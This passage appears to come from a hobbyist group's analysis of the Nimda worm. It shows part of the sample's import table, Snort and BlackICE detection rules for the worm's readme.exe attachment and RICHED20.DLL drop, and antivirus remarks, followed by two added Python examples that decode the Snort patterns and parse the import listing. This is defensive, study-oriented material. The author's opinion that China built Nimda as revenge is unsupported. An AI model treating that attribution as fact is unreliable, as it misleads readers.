36178579 db 0 ; 3617857A aCreatemutexa db 'CreateMutexA',0 36178587 db 0 ; 36178588 db 2 ; 36178589 db 3 ; 3617858A aLstrcpya db 'lstrcpyA',0 36178593 db 0 ; 36178594 db 0CEh ; ╬ 36178595 db 0 ; 36178596 aGetcomputernam db 'GetComputerNameA',0 361785A7 db 0 ; 361785A8 db 0CCh ; ╠ 361785A9 db 1 ; 361785AA aLocalfree db 'LocalFree',0 361785B4 db 8 ; 361785B5 db 3 ; 361785B6 aLstrlena db 'lstrlenA',0 361785BF db 0 ; 361785C0 db 0C8h ; ╚ 361785C1 db 1 ; 361785C2 aLocalalloc db 'LocalAlloc',0 361785CD db 0 ; 361785CE db 4Ah ; J 361785CF db 0 ; 361785D0 aCreatethread db 'CreateThread',0 361785DD db 0 ; 361785DE db 25h ; % 361785DF db 2 ; 361785E0 aReleasemutex db 'ReleaseMutex',0 361785ED db 0 ; 361785EE db 0CEh ; ╬ 361785EF db 2 ; 361785F0 aWaitforsingleo db 'WaitForSingleObject',0 36178604 db 4 ; 36178605 db 1 ; 36178606 aGetdrivetypea db 'GetDriveTypeA',0 36178614 db 20h ; 36178615 db 1 ; 36178616 aGetlogicaldriv db 'GetLogicalDrives',0 36178627 db 0 ; 36178628 db 12h ; 36178629 db 1 ; 3617862A aGetfilesize db 'GetFileSize',0 36178636 db 28h ; ( 36178637 db 0 ; 36178638 aCopyfilea db 'CopyFileA',0 36178642 db 0Dh ; 36178643 db 1 ; 36178644 aGetfileattribu db 'GetFileAttributesA',0 36178657 db 0 ; 36178658 db 6Ch ; l 36178659 db 2 ; 3617865A aSetfiletime db 'SetFileTime',0 36178666 db 14h ; 36178667 db 1 ; 36178668 aGetfiletime db 'GetFileTime',0 36178674 db 64h ; d 36178675 db 0 ; 36178676 aEndupdateresou db 'EndUpdateResourceA',0 36178689 db 0 ; 3617868A db 0B4h ; ┤ 3617868B db 2 ; 3617868C aUpdateresource db 'UpdateResourceA',0 3617869C db 95h ; ò 3617869D db 2 ; 3617869E aSizeofresource db 'SizeofResource',0 361786AD db 0 ; 361786AE db 0D5h ; ╒ 361786AF db 1 ; 361786B0 aLockresource db 'LockResource',0 361786BD db 0 ; 361786BE db 0C7h ; ╟ 361786BF db 1 ; 361786C0 aLoadresource db 'LoadResource',0 361786CD db 0 ; 361786CE db 0A3h ; ú 361786CF db 0 ; 361786D0 aFindresourcea db 'FindResourceA',0 361786DE db 0B4h ; ┤ 361786DF db 0 ; 361786E0 aFreelibrary db 
'FreeLibrary',0 361786EC db 0Ch ; 361786ED db 0 ; 361786EE aBeginupdateres db 'BeginUpdateResourceA',0 36178703 db 0 ; 36178704 db 0C3h ; ├ 36178705 db 1 ; 36178706 aLoadlibraryexa db 'LoadLibraryExA',0 36178715 db 0 ; 36178716 db 57h ; W 36178717 db 0 ; 36178718 aDeletefilea db 'DeleteFileA',0 36178724 db 63h ; c 36178725 db 1 ; 36178726 aGettempfilenam db 'GetTempFileNameA',0 36178737 db 0 ; 36178738 db 44h ; D 36178739 db 0 ; 3617873A aCreateprocessa db 'CreateProcessA',0 36178749 db 0 ; 3617874A db 24h ; $ 3617874B db 1 ; 3617874C aGetmodulefilen db 'GetModuleFileNameA',0 3617875F db 0 ; 36178760 db 0F5h ; ⌡ 36178761 db 0 ; 36178762 aGetcurrentdire db 'GetCurrentDirectoryA',0 36178777 db 0 ; 36178778 db 0CAh ; ╩ 36178779 db 0 ; 3617877A aGetcommandline db 'GetCommandLineA',0 3617878A db 65h ; e 3617878B db 1 ; 3617878C aGettemppatha db 'GetTempPathA',0 36178799 db 0 ; 3617879A db 59h ; Y 3617879B db 1 ; 3617879C aGetsystemdirec db 'GetSystemDirectoryA',0 361787B0 db 7Dh ; } 361787B1 db 1 ; 361787B2 aGetwindowsdire db 'GetWindowsDirectoryA',0 361787C7 db 0 ; 361787C8 db 26h ; & 361787C9 db 1 ; 361787CA aGetmodulehandl db 'GetModuleHandleA',0 361787DB db 0 ; 361787DC db 75h ; u 361787DD db 1 ; 361787DE aGetversionexa db 'GetVersionExA',0 361787EC db 3Eh ; > 361787ED db 1 ; 361787EE aGetprocaddress db 'GetProcAddress',0 361787FD db 0 ; 361787FE db 0C2h ; ┬ 361787FF db 1 ; 36178800 aLoadlibrarya db 'LoadLibraryA',0 3617880D db 0 ; 3617880E db 5Dh ; ] 3617880F db 1 ; 36178810 aGetsystemtime db 'GetSystemTime',0 3617881E db 7Dh ; } 3617881F db 0 ; 36178820 aExitprocess db 'ExitProcess',0 3617882C db 9Dh ; ¥ 3617882D db 1 ; 3617882E aHeapdestroy_0 db 'HeapDestroy',0 3617883A db 1Ah ; 3617883B db 1 ; 3617883C aGetlasterror db 'GetLastError',0 36178849 db 0 ; 3617884A db 9Bh ; ####################TERMINA################### [PROFILAXIS Y ERRADICACION] 1.-[REGLAS PARA FIREWALLS] +BLACKICE Excerpt from a mail by <robert_david_graham@yahoo.com>: Here are some BlackICE rules 
you might want to play with. The first two look within MIME headers for filenames of "readme.exe" and "readme.eml". The third looks for any file creation attempt of "RICHED20.DLL".

mimefilename.2014101 = readme.exe
issue.2014101.name = Nimda Readme.exe
issue.2014101.severity = 4
mimefilename.2014102 = readme.eml
issue.2014102.name = Nimda Readme.eml
issue.2014102.severity = 4
smb.filename.2002710 = */riched20.dll
issue.2002710.name = SMB Nimda RICHED20.DLL
issue.2002710.severity = 4

(Enter these as configuration parameters in ICEcap or add them locally to blackice.ini). Note that even without these rules, you'll still catch most of what the worm does over HTTP, SMB, and surprisingly TFTP.

+SNORT

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Nimda worm attempt"; uricontent:"readme.eml"; flags:A+;)
alert tcp $EXTERNAL_NET 80 -> $HOME_NET any (msg:"Nimda worm attempt"; content:"|2e6f70656e2822726561646d652e652e656d6c|"; flags:A+;)
alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (msg:"Nimda worm attempt"; content:"|6e616d653d22726561646d652e65786522|"; flags:A+;)
alert tcp $HOME_NET any -> $EXTERNAL_NET 25 (msg:"Nimda worm attempt"; content:"|6e616d653d22726561646d652e65786522|"; flags:A+;)
alert tcp any any -> any 139,445 (msg:"SMB Nimda RICHED20.DLL"; content:"R|00|I|00|C|00|H|00|E|00|D|00|2|00|0"; flags:A+;)

2.-[ERADICATION USING ANTIVIRUS]

Download the latest dat file updates.

SYMANTEC: YES, NOT VERY RELIABLE
PANDA: NOT RELIABLE
AVP: YES, RELIABLE
PC-CILLIN: YES

3.-[PATCHES FOR MICROSOFT WINDOWS NT AND MICROSOFT WINDOWS 2000]

http://www.microsoft.com/technet/security/bulletin/

[PERSONAL OPINION]

Nimda..... Revenge by the people of the People's Republic of China against the United States government... As we can see, for the United States it never rains but it pours... First REDCODE, then BLUECODE, and now Nimda wreaks havoc on machines in the United States... and all over the world.
Nimda, an excellent virus developed once again to test vulnerabilities in the Win 9.x, 2000 and NT platforms, although errors were also reported on Apache machines, crashing the httpd.... CAREFUL: SIRCAM IS ALMOST EXTINCT, but Nimda still has a long road ahead of it.

[ACKNOWLEDGEMENTS]

Anthrax: Wrote this article.
LocoMX: Passed me the virus, as well as several analyses of infected machines.
Crond: Prepared an analysis of infected machines as well as the infection of a LAN, to test what Nimda can do.
Java: Searched for information and passed me the virus's primary strings.

[FAREWELL]

Once again acidklan prepares an analysis of a virus that causes great trouble. I hope you enjoy it.

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|DEDICATED TO THE MEMORY OF THE PEOPLE WHO LOST THEIR LIVES IN THE DISASTERS |
|THAT TOOK PLACE IN THE UNITED STATES. WE SEND OUR GREETINGS, AS WELL AS OUR |
|DEEPEST CONDOLENCES TO THE FAMILIES OF THE COMPATRIOTS WHO DIED IN THEM.    |
|                    MEXICO AGAINST TERRORISM OF ANY KIND                    |
|                                                                            |
|Note: We are neither against nor in favor of anyone... We are only in       |
|      favor of life.                                         ACIDKLAN MEXICO|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Questions and suggestions: anthrax@acidklan.org, java@acidklan.org, webmaster@acidklan.org, locomx@acidklan.org

ACIDKLAN DEVELOPMENT AND INVESTIGATION TEAM.
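The Snort rules in the prophylaxis section write their signatures in Snort's content syntax, where runs of hex bytes between `|` bars may be mixed with literal text. The following is an added example, not code from the article or its authors: it decodes that syntax into raw bytes and scans a few constructed traffic samples (the MIME header, the SMB fragment and the benign reply are all made up for this demonstration) with the patterns quoted in the article, so that a reader can see exactly what each rule is looking for on the wire.

```python
"""Decode the article's Snort ``content:`` patterns and scan sample payloads.

Added example, not part of the original article. The RULES patterns are the
ones quoted in the article's Snort section; every payload in SAMPLES is
constructed for this demonstration.
"""


# (alert message, content pattern) pairs copied from the article's rules.
RULES = [
    ("Nimda worm attempt (HTTP reply)", "|2e6f70656e2822726561646d652e652e656d6c|"),
    ("Nimda worm attempt (SMTP)", "|6e616d653d22726561646d652e65786522|"),
    ("SMB Nimda RICHED20.DLL", "R|00|I|00|C|00|H|00|E|00|D|00|2|00|0"),
]


def decode_content(pattern: str) -> bytes:
    """Turn a Snort content string into the bytes Snort would search for.

    Text outside ``|...|`` is literal; text inside is hex digit pairs,
    optionally separated by spaces.  An odd number of bars is malformed.
    """
    if pattern.count("|") % 2:
        raise ValueError("unbalanced '|' in content pattern: %r" % pattern)
    out = bytearray()
    for i, part in enumerate(pattern.split("|")):
        if i % 2 == 0:                      # even chunks are literal text
            out += part.encode("latin-1")
        else:                               # odd chunks are hex runs
            out += bytes.fromhex(part.replace(" ", ""))
    return bytes(out)


def scan(payload: bytes) -> list:
    """Return the message of every rule whose content occurs in payload."""
    return [msg for msg, pat in RULES if decode_content(pat) in payload]


# Constructed sample traffic (not captured data).
SAMPLES = {
    # MIME part header naming the attachment the article describes.
    "smtp_attachment": (
        b"Content-Type: audio/x-wav;\r\n"
        b'\tname="readme.exe"\r\n'
        b"Content-Transfer-Encoding: base64\r\n"
    ),
    # SMB carries file names as UTF-16LE, hence the R|00|I|00|... pattern.
    "smb_create": b"\xffSMB\xa2" + "\\RICHED20.DLL".encode("utf-16-le"),
    # Same request with a lower-case name: Snort content matching is
    # case-sensitive unless the rule adds ``nocase``, so this is a miss.
    "smb_create_lowercase": b"\xffSMB\xa2" + "\\riched20.dll".encode("utf-16-le"),
    "benign_http": b"HTTP/1.1 200 OK\r\n\r\n<html><body>hello</body></html>",
}


if __name__ == "__main__":
    for msg, pat in RULES:
        print("%-32s -> %r" % (msg, decode_content(pat)))
    for name, payload in SAMPLES.items():
        print("%-22s %s" % (name, scan(payload) or "no match"))
```

Decoding shows the SMTP pattern is simply `name="readme.exe"` as it appears in a MIME part header, and the SMB pattern is the UTF-16LE spelling of `RICHED20` minus its final NUL. The lower-case SMB sample is included to show the caveat: the article's rule as written only fires on the upper-case spelling, so a deployment that wants both would add `nocase` to that rule.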
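The `db` listing that closes the debugger source section is the tail of the sample's import hint/name table as a disassembler prints it: for each imported function there is an optional pad byte, a little-endian 16-bit hint, then the NUL-terminated API name. The following is an added example, not the article's own tooling, that parses such a listing back into (hint, name) pairs; the LISTING text is a constructed subset of the article's dump, and the address-based lookup (hint bytes at name address minus 2 and minus 1) is the layout assumed from that dump.

```python
"""Recover (hint, name) pairs from an IDA-style ``db`` listing.

Added example, not from the article. LISTING is a constructed excerpt of the
article's dump; the layout assumed is: [pad byte] hint WORD (little-endian)
then the NUL-terminated function name.
"""
import re

LISTING = """\
361786EC db 0Ch
361786ED db 0
361786EE aBeginupdateres db 'BeginUpdateResourceA',0
36178703 db 0
36178704 db 0C3h ; pad/hint bytes may carry IDA's char comment
36178705 db 1
36178706 aLoadlibraryexa db 'LoadLibraryExA',0
36178715 db 0
36178716 db 57h ; W
36178717 db 0
36178718 aDeletefilea db 'DeleteFileA',0
36178724 db 63h ; c
36178725 db 1
36178726 aGettempfilenam db 'GetTempFileNameA',0
"""

# "ADDR db VALUE [; comment]"
BYTE_RE = re.compile(r"^([0-9A-Fa-f]{8})\s+db\s+([0-9A-Fa-f]+h?)\s*(?:;.*)?$")
# "ADDR label db 'Name',0 [; comment]"
NAME_RE = re.compile(r"^([0-9A-Fa-f]{8})\s+\w+\s+db\s+'([^']*)',0\s*(?:;.*)?$")


def parse_asm_number(text: str) -> int:
    """MASM/IDA numbers: a trailing 'h' marks hex, otherwise decimal."""
    return int(text[:-1], 16) if text.endswith("h") else int(text, 10)


def parse_hint_name_table(listing: str) -> list:
    """Return [(hint, name), ...] in listing order.

    The hint is None when the excerpt does not contain both bytes that
    precede the name (for example a name cut off at the start of a dump).
    """
    byte_at = {}      # address -> byte value, from the bare db lines
    names = []        # (address, name), from the string db lines
    for raw in listing.splitlines():
        line = raw.strip()
        m = BYTE_RE.match(line)
        if m:
            byte_at[int(m.group(1), 16)] = parse_asm_number(m.group(2))
            continue
        m = NAME_RE.match(line)
        if m:
            names.append((int(m.group(1), 16), m.group(2)))

    table = []
    for addr, name in names:
        lo, hi = byte_at.get(addr - 2), byte_at.get(addr - 1)
        hint = None if lo is None or hi is None else lo | (hi << 8)
        table.append((hint, name))
    return table


if __name__ == "__main__":
    for hint, name in parse_hint_name_table(LISTING):
        print("hint %5s  %s" % (hint, name))
```

Reading the names out this way is the usual first triage step on a sample: the article's own list (BeginUpdateResourceA, CreateProcessA, GetTempFileNameA, DeleteFileA and the rest) already tells an analyst that the binary rewrites resources in other executables and drops and launches temporary files, before a single instruction is followed.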
